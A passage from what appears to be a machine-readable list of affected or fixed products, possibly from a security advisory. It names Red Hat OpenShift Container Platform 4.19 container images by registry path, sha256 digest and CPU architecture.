"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
